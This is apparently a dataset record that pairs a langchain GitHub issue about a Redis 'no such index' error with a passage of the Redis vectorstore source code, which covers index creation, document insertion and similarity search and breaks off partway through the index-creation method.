""" self.table.delete(row_id=document_id) def clear(self, **kwargs: Any) -> None: """Clear the *whole* semantic cache.""" self.table.clear() class FullMd5LLMCache(Base): # type: ignore """SQLite table for full LLM Cache (all generations).""" __tablename__ = "full_md5_llm_cache" id = Column(String, primary_key=True) prompt_md5 = Column(String, index=True) llm = Column(String, index=True) idx = Column(Integer, index=True) prompt = Column(String) response = Column(String) class SQLAlchemyMd5Cache(BaseCache): """Cache that uses SQAlchemy as a backend.""" def __init__( self, engine: Engine, cache_schema: Type[FullMd5LLMCache] = FullMd5LLMCache ): """Initialize by creating all tables.""" self.engine = engine self.cache_schema = cache_schema self.cache_schema.metadata.create_all(self.engine) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" rows = self._search_rows(prompt, llm_string) if rows: return [loads(row[0]) for row in rows] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update based on prompt and llm_string.""" self._delete_previous(prompt, llm_string) prompt_md5 = self.get_md5(prompt) items = [ self.cache_schema( id=str(uuid.uuid1()), prompt=prompt, prompt_md5=prompt_md5, llm=llm_string, response=dumps(gen), idx=i, ) for i, gen in enumerate(return_val) ] with Session(self.engine) as session, session.begin(): for item in items: session.merge(item) def _delete_previous(self, prompt: str, llm_string: str) -> None: stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt_md5 == self.get_md5(prompt)) # type: ignore .where(self.cache_schema.llm == llm_string) .where(self.cache_schema.prompt == prompt) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session, session.begin(): rows = session.execute(stmt).fetchall() for item in rows: session.delete(item) def _search_rows(self, prompt: str, llm_string: str) -> List[Row]: prompt_pd5 = self.get_md5(prompt) stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt_md5 == prompt_pd5) # type: ignore .where(self.cache_schema.llm == llm_string) .where(self.cache_schema.prompt == prompt) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session: return session.execute(stmt).fetchall() def clear(self, **kwargs: Any) -> None: """Clear cache.""" with Session(self.engine) as session: session.execute(self.cache_schema.delete()) @staticmethod def get_md5(input_string: str) -> str: return hashlib.md5(input_string.encode()).hexdigest()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,197
Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"]
### System Info Following the indexing steps from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error: "redis.exceptions.ResponseError: my_docs: no such index". You'll get this exception while using Redis as a retriever: ![Screenshot from 2023-09-28 16-57-03](https://github.com/langchain-ai/langchain/assets/81446007/afae536e-7888-4183-93d0-bfa65a8845a2) ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![Screenshot from 2023-09-28 16-13-18](https://github.com/langchain-ai/langchain/assets/81446007/281206ed-b7c6-4b18-a3cc-25874fec7a06) The error is here: ![Screenshot from 2023-09-28 16-32-00](https://github.com/langchain-ai/langchain/assets/81446007/f6bf52fb-d0ef-4f38-b247-475522bdfece) If you look for the index, you'll get (empty list or set). This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason. I'll try to fix it, but I'm not sure it's possible for me at the moment, so I'm reporting this in the hope it helps. ### Expected behavior Expected behavior inside Redis: "docs:indexname_:12ss2sadd"
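A quick way to confirm the symptom from this report (a hedged sketch using redis-py, which the vectorstore wraps; the index name and URL are assumptions taken from the screenshots):

```python
# Check whether the search index actually exists before querying it;
# FT.INFO raises ResponseError for a missing index, which is the error above.
import redis

client = redis.Redis.from_url("redis://localhost:6379")
try:
    client.ft("my_docs").info()
    print("index 'my_docs' exists")
except redis.exceptions.ResponseError as e:
    print(f"{e} -- create the index first, e.g. via Redis.from_texts(...)")
```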
https://github.com/langchain-ai/langchain/issues/11197
https://github.com/langchain-ai/langchain/pull/11257
079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a
d5c2ce7c2e1179907400f2c96fc6309a54cbce6a
"2023-09-28T19:57:36Z"
python
"2023-10-24T17:51:25Z"
libs/langchain/langchain/vectorstores/redis/base.py
"""Wrapper around Redis vector database.""" from __future__ import annotations import logging import os import uuid from typing import ( TYPE_CHECKING, Any, Callable, Dict, Iterable, List, Mapping, Optional, Tuple, Type, Union, cast, ) import numpy as np import yaml from langchain._api import deprecated from langchain.callbacks.manager import ( AsyncCallbackManagerForRetrieverRun, CallbackManagerForRetrieverRun, ) from langchain.docstore.document import Document from langchain.schema.embeddings import Embeddings from langchain.schema.vectorstore import VectorStore, VectorStoreRetriever from langchain.utilities.redis import ( _array_to_buffer, _buffer_to_array, check_redis_module_exist, get_client, ) from langchain.utils import get_from_dict_or_env from langchain.vectorstores.redis.constants import ( REDIS_REQUIRED_MODULES, REDIS_TAG_SEPARATOR, ) from langchain.vectorstores.utils import maximal_marginal_relevance logger = logging.getLogger(__name__) if TYPE_CHECKING: from redis.client import Redis as RedisType from redis.commands.search.query import Query from langchain.vectorstores.redis.filters import RedisFilterExpression from langchain.vectorstores.redis.schema import RedisModel def _redis_key(prefix: str) -> str: """Redis key schema for a given prefix.""" return f"{prefix}:{uuid.uuid4().hex}" def _redis_prefix(index_name: str) -> str: """Redis key prefix for a given index.""" return f"doc:{index_name}" def _default_relevance_score(val: float) -> float: return 1 - val def check_index_exists(client: RedisType, index_name: str) -> bool: """Check if Redis index exists.""" try: client.ft(index_name).info() except: # noqa: E722 logger.info("Index does not exist") return False logger.info("Index already exists") return True class Redis(VectorStore): """Redis vector database. To use, you should have the ``redis`` python package installed and have a running Redis Enterprise or Redis-Stack server For production use cases, it is recommended to use Redis Enterprise as the scaling, performance, stability and availability is much better than Redis-Stack. For testing and prototyping, however, this is not required. Redis-Stack is available as a docker container the full vector search API available. .. code-block:: bash # to run redis stack in docker locally docker run -d -p 6379:6379 -p 8001:8001 redis/redis-stack:latest Once running, you can connect to the redis server with the following url schemas: - redis://<host>:<port> # simple connection - redis://<username>:<password>@<host>:<port> # connection with authentication - rediss://<host>:<port> # connection with SSL - rediss://<username>:<password>@<host>:<port> # connection with SSL and auth Examples: The following examples show various ways to use the Redis VectorStore with LangChain. For all the following examples assume we have the following imports: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings Initialize, create index, and load Documents .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings rds = Redis.from_documents( documents, # a list of Document objects from loaders or created embeddings, # an Embeddings object redis_url="redis://localhost:6379", ) Initialize, create index, and load Documents with metadata .. 
code-block:: python rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object redis_url="redis://localhost:6379", ) Initialize, create index, and load Documents with metadata and return keys .. code-block:: python rds, keys = Redis.from_texts_return_keys( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object redis_url="redis://localhost:6379", ) For use cases where the index needs to stay alive, you can initialize with an index name such that it's easier to reference later .. code-block:: python rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object index_name="my-index", redis_url="redis://localhost:6379", ) Initialize and connect to an existing index (from above) .. code-block:: python rds = Redis.from_existing_index( embeddings, # an Embeddings object index_name="my-index", redis_url="redis://localhost:6379", ) Advanced examples: Custom vector schema can be supplied to change the way that Redis creates the underlying vector schema. This is useful for production use cases where you want to optimize the vector schema for your use case. e.g. using HNSW instead of FLAT (knn), which is the default .. code-block:: python vector_schema = { "algorithm": "HNSW" } rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object vector_schema=vector_schema, redis_url="redis://localhost:6379", ) Custom index schema can be supplied to change the way that the metadata is indexed. This is useful if you would like to use the hybrid querying (filtering) capability of Redis. By default, this implementation will automatically generate the index schema according to the following rules: - All strings are indexed as text fields - All numbers are indexed as numeric fields - All lists of strings are indexed as tag fields (joined by langchain.vectorstores.redis.constants.REDIS_TAG_SEPARATOR) - All None values are not indexed but still stored in Redis; these are not retrievable through the interface here, but the raw Redis client can be used to retrieve them. - All other types are not indexed To override these rules, you can pass in a custom index schema like the following .. code-block:: yaml tag: - name: credit_score text: - name: user - name: job Typically, the ``credit_score`` field would be a text field since it's a string, however, we can override this behavior by specifying the field type as shown with the yaml config (can also be a dictionary) above and the code below. .. code-block:: python rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object index_schema="path/to/index_schema.yaml", # can also be a dictionary redis_url="redis://localhost:6379", ) When connecting to an existing index where a custom schema has been applied, it's important to pass in the same schema to the ``from_existing_index`` method. Otherwise, the schema for newly added samples will be incorrect and metadata will not be returned.
""" DEFAULT_VECTOR_SCHEMA = { "name": "content_vector", "algorithm": "FLAT", "dims": 1536, "distance_metric": "COSINE", "datatype": "FLOAT32", } def __init__( self, redis_url: str, index_name: str, embedding: Embeddings, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, relevance_score_fn: Optional[Callable[[float], float]] = None, **kwargs: Any, ): """Initialize with necessary components.""" self._check_deprecated_kwargs(kwargs) try: # TODO use importlib to check if redis is installed import redis # noqa: F401 except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e self.index_name = index_name self._embeddings = embedding try: redis_client = get_client(redis_url=redis_url, **kwargs) # check if redis has redisearch module installed check_redis_module_exist(redis_client, REDIS_REQUIRED_MODULES) except ValueError as e: raise ValueError(f"Redis failed to connect: {e}") self.client = redis_client self.relevance_score_fn = relevance_score_fn self._schema = self._get_schema_with_defaults(index_schema, vector_schema) @property def embeddings(self) -> Optional[Embeddings]: """Access the query embedding object if available.""" return self._embeddings @classmethod def from_texts_return_keys( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, index_name: Optional[str] = None, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, **kwargs: Any, ) -> Tuple[Redis, List[str]]: """Create a Redis vectorstore from raw documents. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new Redis index if it doesn't already exist 3. Adds the documents to the newly created Redis index. 4. Returns the keys of the newly created documents once stored. This method will generate schema based on the metadata passed in if the `index_schema` is not defined. If the `index_schema` is defined, it will compare against the generated schema and warn if there are differences. If you are purposefully defining the schema for the metadata, then you can ignore that warning. To examine the schema options, initialize an instance of this class and print out the schema using the `Redis.schema`` property. This will include the content and content_vector classes which are always present in the langchain schema. Example: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redis, keys = Redis.from_texts_return_keys( texts, embeddings, redis_url="redis://localhost:6379" ) Args: texts (List[str]): List of texts to add to the vectorstore. embedding (Embeddings): Embeddings to use for the vectorstore. metadatas (Optional[List[dict]], optional): Optional list of metadata dicts to add to the vectorstore. Defaults to None. index_name (Optional[str], optional): Optional name of the index to create or add to. Defaults to None. index_schema (Optional[Union[Dict[str, str], str, os.PathLike]], optional): Optional fields to index within the metadata. Overrides generated schema. Defaults to None. vector_schema (Optional[Dict[str, Union[str, int]]], optional): Optional vector schema to use. Defaults to None. **kwargs (Any): Additional keyword arguments to pass to the Redis client. 
Returns: Tuple[Redis, List[str]]: Tuple of the Redis instance and the keys of the newly created documents. Raises: ValueError: If the number of metadatas does not match the number of texts. """ try: # TODO use importlib to check if redis is installed import redis # noqa: F401 from langchain.vectorstores.redis.schema import read_schema except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") if "redis_url" in kwargs: kwargs.pop("redis_url") # flag to use generated schema if "generate" in kwargs: kwargs.pop("generate") # see if the user specified keys keys = None if "keys" in kwargs: keys = kwargs.pop("keys") # Name of the search index if not given if not index_name: index_name = uuid.uuid4().hex # type check for metadata if metadatas: if isinstance(metadatas, list) and len(metadatas) != len(texts): # type: ignore # noqa: E501 raise ValueError("Number of metadatas must match number of texts") if not (isinstance(metadatas, list) and isinstance(metadatas[0], dict)): raise ValueError("Metadatas must be a list of dicts") generated_schema = _generate_field_schema(metadatas[0]) if index_schema: # read in the schema solely to compare to the generated schema user_schema = read_schema(index_schema) # the very rare case where a super user decides to pass the index # schema and a document loader is used that has metadata which # we need to map into fields. if user_schema != generated_schema: logger.warning( "`index_schema` does not match generated metadata schema.\n" + "If you meant to manually override the schema, please " + "ignore this message.\n" + f"index_schema: {user_schema}\n" + f"generated_schema: {generated_schema}\n" ) else: # use the generated schema index_schema = generated_schema # Create instance instance = cls( redis_url, index_name, embedding, index_schema=index_schema, vector_schema=vector_schema, **kwargs, ) # Create embeddings over documents embeddings = embedding.embed_documents(texts) # Create the search index instance._create_index(dim=len(embeddings[0])) # Add data to Redis keys = instance.add_texts(texts, metadatas, embeddings, keys=keys) return instance, keys @classmethod def from_texts( cls: Type[Redis], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, index_name: Optional[str] = None, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, **kwargs: Any, ) -> Redis: """Create a Redis vectorstore from a list of texts. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new Redis index if it doesn't already exist 3. Adds the documents to the newly created Redis index. This method will generate schema based on the metadata passed in if the `index_schema` is not defined. If the `index_schema` is defined, it will compare against the generated schema and warn if there are differences. If you are purposefully defining the schema for the metadata, then you can ignore that warning. To examine the schema options, initialize an instance of this class and print out the schema using the `Redis.schema`` property. This will include the content and content_vector classes which are always present in the langchain schema. Example: .. 
code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redisearch = RediSearch.from_texts( texts, embeddings, redis_url="redis://username:password@localhost:6379" ) Args: texts (List[str]): List of texts to add to the vectorstore. embedding (Embeddings): Embedding model class (i.e. OpenAIEmbeddings) for embedding queries. metadatas (Optional[List[dict]], optional): Optional list of metadata dicts to add to the vectorstore. Defaults to None. index_name (Optional[str], optional): Optional name of the index to create or add to. Defaults to None. index_schema (Optional[Union[Dict[str, str], str, os.PathLike]], optional): Optional fields to index within the metadata. Overrides generated schema. Defaults to None. vector_schema (Optional[Dict[str, Union[str, int]]], optional): Optional vector schema to use. Defaults to None. **kwargs (Any): Additional keyword arguments to pass to the Redis client. Returns: Redis: Redis VectorStore instance. Raises: ValueError: If the number of metadatas does not match the number of texts. ImportError: If the redis python package is not installed. """ instance, _ = cls.from_texts_return_keys( texts, embedding, metadatas=metadatas, index_name=index_name, index_schema=index_schema, vector_schema=vector_schema, **kwargs, ) return instance @classmethod def from_existing_index( cls, embedding: Embeddings, index_name: str, schema: Union[Dict[str, str], str, os.PathLike], **kwargs: Any, ) -> Redis: """Connect to an existing Redis index. Example: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redisearch = Redis.from_existing_index( embeddings, index_name="my-index", redis_url="redis://username:password@localhost:6379" ) Args: embedding (Embeddings): Embedding model class (i.e. OpenAIEmbeddings) for embedding queries. index_name (str): Name of the index to connect to. schema (Union[Dict[str, str], str, os.PathLike]): Schema of the index and the vector schema. Can be a dict, or path to yaml file **kwargs (Any): Additional keyword arguments to pass to the Redis client. Returns: Redis: Redis VectorStore instance. Raises: ValueError: If the index does not exist. ImportError: If the redis python package is not installed. """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") try: # We need to first remove redis_url from kwargs, # otherwise passing it to Redis will result in an error. if "redis_url" in kwargs: kwargs.pop("redis_url") client = get_client(redis_url=redis_url, **kwargs) # check if redis has redisearch module installed check_redis_module_exist(client, REDIS_REQUIRED_MODULES) # ensure that the index already exists assert check_index_exists( client, index_name ), f"Index {index_name} does not exist" except Exception as e: raise ValueError(f"Redis failed to connect: {e}") return cls( redis_url, index_name, embedding, index_schema=schema, **kwargs, ) @property def schema(self) -> Dict[str, List[Any]]: """Return the schema of the index.""" return self._schema.as_dict() def write_schema(self, path: Union[str, os.PathLike]) -> None: """Write the schema to a yaml file.""" with open(path, "w+") as f: yaml.dump(self.schema, f) @staticmethod def delete( ids: Optional[List[str]] = None, **kwargs: Any, ) -> bool: """ Delete a Redis entry. Args: ids: List of ids (keys in redis) to delete. redis_url: Redis connection url. 
This should be passed in the kwargs or set as an environment variable: REDIS_URL. Returns: bool: Whether or not the deletions were successful. Raises: ValueError: If the redis python package is not installed. ValueError: If the ids (keys in redis) are not provided """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") if ids is None: raise ValueError("'ids' (keys) were not provided.") try: import redis # noqa: F401 except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) try: # We need to first remove redis_url from kwargs, # otherwise passing it to Redis will result in an error. if "redis_url" in kwargs: kwargs.pop("redis_url") client = get_client(redis_url=redis_url, **kwargs) except ValueError as e: raise ValueError(f"Redis failed to connect: {e}") # Delete the keys try: client.delete(*ids) logger.info("Entries deleted") return True except: # noqa: E722 # ids do not exist return False @staticmethod def drop_index( index_name: str, delete_documents: bool, **kwargs: Any, ) -> bool: """ Drop a Redis search index. Args: index_name (str): Name of the index to drop. delete_documents (bool): Whether to drop the associated documents. Returns: bool: Whether or not the drop was successful. """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") try: import redis # noqa: F401 except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) try: # We need to first remove redis_url from kwargs, # otherwise passing it to Redis will result in an error. if "redis_url" in kwargs: kwargs.pop("redis_url") client = get_client(redis_url=redis_url, **kwargs) except ValueError as e: raise ValueError(f"Redis failed to connect: {e}") # Drop the index if it exists try: client.ft(index_name).dropindex(delete_documents) logger.info("Index dropped") return True except: # noqa: E722 # Index does not exist return False def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, embeddings: Optional[List[List[float]]] = None, batch_size: int = 1000, clean_metadata: bool = True, **kwargs: Any, ) -> List[str]: """Add more texts to the vectorstore. Args: texts (Iterable[str]): Iterable of strings/text to add to the vectorstore. metadatas (Optional[List[dict]], optional): Optional list of metadatas. Defaults to None. embeddings (Optional[List[List[float]]], optional): Optional pre-generated embeddings. Defaults to None. keys (List[str]) or ids (List[str]): Identifiers of entries. Defaults to None. batch_size (int, optional): Batch size to use for writes. Defaults to 1000.
Returns: List[str]: List of ids added to the vectorstore """ ids = [] prefix = _redis_prefix(self.index_name) # Get keys or ids from kwargs # Other vectorstores use ids keys_or_ids = kwargs.get("keys", kwargs.get("ids")) # type check for metadata if metadatas: if isinstance(metadatas, list) and len(metadatas) != len(texts): # type: ignore # noqa: E501 raise ValueError("Number of metadatas must match number of texts") if not (isinstance(metadatas, list) and isinstance(metadatas[0], dict)): raise ValueError("Metadatas must be a list of dicts") # Write data to redis pipeline = self.client.pipeline(transaction=False) for i, text in enumerate(texts): # Use provided values by default or fallback key = keys_or_ids[i] if keys_or_ids else _redis_key(prefix) metadata = metadatas[i] if metadatas else {} metadata = _prepare_metadata(metadata) if clean_metadata else metadata embedding = ( embeddings[i] if embeddings else self._embeddings.embed_query(text) ) pipeline.hset( key, mapping={ self._schema.content_key: text, self._schema.content_vector_key: _array_to_buffer( embedding, self._schema.vector_dtype ), **metadata, }, ) ids.append(key) # Write batch if i % batch_size == 0: pipeline.execute() # Cleanup final batch pipeline.execute() return ids def as_retriever(self, **kwargs: Any) -> RedisVectorStoreRetriever: tags = kwargs.pop("tags", None) or [] tags.extend(self._get_retriever_tags()) return RedisVectorStoreRetriever(vectorstore=self, **kwargs, tags=tags) @deprecated("0.0.272", alternative="similarity_search(distance_threshold=0.1)") def similarity_search_limit_score( self, query: str, k: int = 4, score_threshold: float = 0.2, **kwargs: Any ) -> List[Document]: """ Returns the most similar indexed documents to the query text within the score_threshold range. Deprecated: Use similarity_search with distance_threshold instead. Args: query (str): The query text for which to find similar documents. k (int): The number of documents to return. Default is 4. score_threshold (float): The minimum matching *distance* required for a document to be considered a match. Defaults to 0.2. Returns: List[Document]: A list of documents that are most similar to the query text including the match score for each document. Note: If there are no documents that satisfy the score_threshold value, an empty list is returned. """ return self.similarity_search( query, k=k, distance_threshold=score_threshold, **kwargs ) def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Run similarity search with **vector distance**. The "scores" returned from this function are the raw vector distances from the query vector. For similarity scores, use ``similarity_search_with_relevance_scores``. Args: query (str): The query text for which to find similar documents. k (int): The number of documents to return. Default is 4. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. Returns: List[Tuple[Document, float]]: A list of documents that are most similar to the query with the distance for each document. """ try: import redis except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e if "score_threshold" in kwargs: logger.warning( "score_threshold is deprecated. Use distance_threshold instead." 
+ "score_threshold should only be used in " + "similarity_search_with_relevance_scores." + "score_threshold will be removed in a future release.", ) query_embedding = self._embeddings.embed_query(query) redis_query, params_dict = self._prepare_query( query_embedding, k=k, filter=filter, with_metadata=return_metadata, with_distance=True, **kwargs, ) # Perform vector search # ignore type because redis-py is wrong about bytes try: results = self.client.ft(self.index_name).search(redis_query, params_dict) # type: ignore # noqa: E501 except redis.exceptions.ResponseError as e: # split error message and see if it starts with "Syntax" if str(e).split(" ")[0] == "Syntax": raise ValueError( "Query failed with syntax error. " + "This is likely due to malformation of " + "filter, vector, or query argument" ) from e raise e # Prepare document results docs_with_scores: List[Tuple[Document, float]] = [] for result in results.docs: metadata = {} if return_metadata: metadata = {"id": result.id} metadata.update(self._collect_metadata(result)) doc = Document(page_content=result.content, metadata=metadata) distance = self._calculate_fp_distance(result.distance) docs_with_scores.append((doc, distance)) return docs_with_scores def similarity_search( self, query: str, k: int = 4, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, distance_threshold: Optional[float] = None, **kwargs: Any, ) -> List[Document]: """Run similarity search Args: query (str): The query text for which to find similar documents. k (int): The number of documents to return. Default is 4. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. distance_threshold (Optional[float], optional): Maximum vector distance between selected documents and the query vector. Defaults to None. Returns: List[Document]: A list of documents that are most similar to the query text. """ query_embedding = self._embeddings.embed_query(query) return self.similarity_search_by_vector( query_embedding, k=k, filter=filter, return_metadata=return_metadata, distance_threshold=distance_threshold, **kwargs, ) def similarity_search_by_vector( self, embedding: List[float], k: int = 4, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, distance_threshold: Optional[float] = None, **kwargs: Any, ) -> List[Document]: """Run similarity search between a query vector and the indexed vectors. Args: embedding (List[float]): The query vector for which to find similar documents. k (int): The number of documents to return. Default is 4. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. distance_threshold (Optional[float], optional): Maximum vector distance between selected documents and the query vector. Defaults to None. Returns: List[Document]: A list of documents that are most similar to the query text. """ try: import redis except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e if "score_threshold" in kwargs: logger.warning( "score_threshold is deprecated. Use distance_threshold instead." + "score_threshold should only be used in " + "similarity_search_with_relevance_scores." 
+ "score_threshold will be removed in a future release.", ) redis_query, params_dict = self._prepare_query( embedding, k=k, filter=filter, distance_threshold=distance_threshold, with_metadata=return_metadata, with_distance=False, ) # Perform vector search # ignore type because redis-py is wrong about bytes try: results = self.client.ft(self.index_name).search(redis_query, params_dict) # type: ignore # noqa: E501 except redis.exceptions.ResponseError as e: # split error message and see if it starts with "Syntax" if str(e).split(" ")[0] == "Syntax": raise ValueError( "Query failed with syntax error. " + "This is likely due to malformation of " + "filter, vector, or query argument" ) from e raise e # Prepare document results docs = [] for result in results.docs: metadata = {} if return_metadata: metadata = {"id": result.id} metadata.update(self._collect_metadata(result)) content_key = self._schema.content_key docs.append( Document(page_content=getattr(result, content_key), metadata=metadata) ) return docs def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, distance_threshold: Optional[float] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. distance_threshold (Optional[float], optional): Maximum vector distance between selected documents and the query vector. Defaults to None. Returns: List[Document]: A list of Documents selected by maximal marginal relevance. """ # Embed the query query_embedding = self._embeddings.embed_query(query) # Fetch the initial documents prefetch_docs = self.similarity_search_by_vector( query_embedding, k=fetch_k, filter=filter, return_metadata=return_metadata, distance_threshold=distance_threshold, **kwargs, ) prefetch_ids = [doc.metadata["id"] for doc in prefetch_docs] # Get the embeddings for the fetched documents prefetch_embeddings = [ _buffer_to_array( cast( bytes, self.client.hget(prefetch_id, self._schema.content_vector_key), ), dtype=self._schema.vector_dtype, ) for prefetch_id in prefetch_ids ] # Select documents using maximal marginal relevance selected_indices = maximal_marginal_relevance( np.array(query_embedding), prefetch_embeddings, lambda_mult=lambda_mult, k=k ) selected_docs = [prefetch_docs[i] for i in selected_indices] return selected_docs def _collect_metadata(self, result: "Document") -> Dict[str, Any]: """Collect metadata from Redis. Method ensures that there isn't a mismatch between the metadata and the index schema passed to this class by the user or generated by this class. Args: result (Document): redis.commands.search.Document object returned from Redis. Returns: Dict[str, Any]: Collected metadata. 
""" # new metadata dict as modified by this method meta = {} for key in self._schema.metadata_keys: try: meta[key] = getattr(result, key) except AttributeError: # warning about attribute missing logger.warning( f"Metadata key {key} not found in metadata. " + "Setting to None. \n" + "Metadata fields defined for this instance: " + f"{self._schema.metadata_keys}" ) meta[key] = None return meta def _prepare_query( self, query_embedding: List[float], k: int = 4, filter: Optional[RedisFilterExpression] = None, distance_threshold: Optional[float] = None, with_metadata: bool = True, with_distance: bool = False, ) -> Tuple["Query", Dict[str, Any]]: # Creates Redis query params_dict: Dict[str, Union[str, bytes, float]] = { "vector": _array_to_buffer(query_embedding, self._schema.vector_dtype), } # prepare return fields including score return_fields = [self._schema.content_key] if with_distance: return_fields.append("distance") if with_metadata: return_fields.extend(self._schema.metadata_keys) if distance_threshold: params_dict["distance_threshold"] = distance_threshold return ( self._prepare_range_query( k, filter=filter, return_fields=return_fields ), params_dict, ) return ( self._prepare_vector_query(k, filter=filter, return_fields=return_fields), params_dict, ) def _prepare_range_query( self, k: int, filter: Optional[RedisFilterExpression] = None, return_fields: Optional[List[str]] = None, ) -> "Query": try: from redis.commands.search.query import Query except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e return_fields = return_fields or [] vector_key = self._schema.content_vector_key base_query = f"@{vector_key}:[VECTOR_RANGE $distance_threshold $vector]" if filter: base_query = "(" + base_query + " " + str(filter) + ")" query_string = base_query + "=>{$yield_distance_as: distance}" return ( Query(query_string) .return_fields(*return_fields) .sort_by("distance") .paging(0, k) .dialect(2) ) def _prepare_vector_query( self, k: int, filter: Optional[RedisFilterExpression] = None, return_fields: Optional[List[str]] = None, ) -> "Query": """Prepare query for vector search. Args: k: Number of results to return. filter: Optional metadata filter. Returns: query: Query object. """ try: from redis.commands.search.query import Query except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." 
) from e return_fields = return_fields or [] query_prefix = "*" if filter: query_prefix = f"{str(filter)}" vector_key = self._schema.content_vector_key base_query = f"({query_prefix})=>[KNN {k} @{vector_key} $vector AS distance]" query = ( Query(base_query) .return_fields(*return_fields) .sort_by("distance") .paging(0, k) .dialect(2) ) return query def _get_schema_with_defaults( self, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, ) -> "RedisModel": # should only be called after init of Redis (so Import handled) from langchain.vectorstores.redis.schema import RedisModel, read_schema schema = RedisModel() # read in schema (yaml file or dict) and # pass to the Pydantic validators if index_schema: schema_values = read_schema(index_schema) schema = RedisModel(**schema_values) # ensure user did not exclude the content field # no modifications if content field found schema.add_content_field() # if no content_vector field, add vector field to schema # this makes adding a vector field to the schema optional when # the user just wants additional metadata try: # see if user overrode the content vector schema.content_vector # if user overrode the content vector, check if they # also passed vector schema. This won't be used since # the index schema overrode the content vector if vector_schema: logger.warning( "`vector_schema` is ignored since content_vector is " + "overridden in `index_schema`." ) # user did not override content vector except ValueError: # set default vector schema and update with user provided schema # if the user provided any vector_field = self.DEFAULT_VECTOR_SCHEMA.copy() if vector_schema: vector_field.update(vector_schema) # add the vector field either way schema.add_vector_field(vector_field) return schema def _create_index(self, dim: int = 1536) -> None: try: from redis.commands.search.indexDefinition import ( # type: ignore IndexDefinition, IndexType, ) except ImportError: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Set vector dimension # can't 